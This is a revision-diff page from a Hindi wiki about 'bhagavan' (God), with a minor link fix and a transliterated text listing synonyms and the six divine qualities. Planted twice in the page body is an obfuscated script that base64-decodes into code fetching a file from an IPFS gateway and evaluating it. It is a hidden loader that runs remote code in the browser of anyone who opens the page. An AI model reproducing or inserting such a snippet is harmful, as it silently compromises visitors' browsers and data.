Difference between revisions of "भगवान"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('{{पुनरीक्षण}}<!-- कृपया इस साँचे को हटाएँ नहीं (डिलीट न क...' के साथ नया पन्ना बनाया)
 
Line 1: Line 1:
 
{{पुनरीक्षण}}<!-- कृपया इस साँचे को हटाएँ नहीं (डिलीट न करें)। इसके नीचे से ही सम्पादन कार्य करें। -->
 
{{पुनरीक्षण}}<!-- कृपया इस साँचे को हटाएँ नहीं (डिलीट न करें)। इसके नीचे से ही सम्पादन कार्य करें। -->
 
*भगवान परमेश्वर का एक गुणवाचक नाम है।  
 
*भगवान परमेश्वर का एक गुणवाचक नाम है।  
*भगवान, परमेश्वर, ईश्वर, [[नारायण]], [[राम]], [[कृष्ण, ये सभी पर्यायवाची शब्द माने जाते हैं, जो कि विष्णु कोटि के हैं।  
+
*भगवान, परमेश्वर, ईश्वर, [[नारायण]], [[राम]], [[कृष्ण]], ये सभी पर्यायवाची शब्द माने जाते हैं, जो कि विष्णु कोटि के हैं।  
 
*'भग' (छ: विशेषताओं) से होने के कारण परमेश्वर को भगवान कहते हैं।  
 
*'भग' (छ: विशेषताओं) से होने के कारण परमेश्वर को भगवान कहते हैं।  
 
*वे जगत का समस्त ऐश्वर्य (सामर्थ्य), समस्त धर्म, समस्त यश, समस्त शोभा, समस्त ज्ञान और समस्त वैराग्य (निर्गुण-निर्लेप स्थिति) हैं।
 
*वे जगत का समस्त ऐश्वर्य (सामर्थ्य), समस्त धर्म, समस्त यश, समस्त शोभा, समस्त ज्ञान और समस्त वैराग्य (निर्गुण-निर्लेप स्थिति) हैं।

Revision as of 06:01, 20 April 2011

chitr:Icon-edit.gif is lekh ka punarikshan evan sampadan hona avashyak hai. ap isamean sahayata kar sakate haian. "sujhav"

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

  • bhagavan parameshvar ka ek gunavachak nam hai.
  • bhagavan, parameshvar, eeshvar, narayan, ram, krishna, ye sabhi paryayavachi shabd mane jate haian, jo ki vishnu koti ke haian.
  • 'bhag' (chh: visheshataoan) se hone ke karan parameshvar ko bhagavan kahate haian.
  • ve jagat ka samast aishvary (samarthy), samast dharm, samast yash, samast shobha, samast jnan aur samast vairagy (nirgun-nirlep sthiti) haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

Template:hiandoo dharm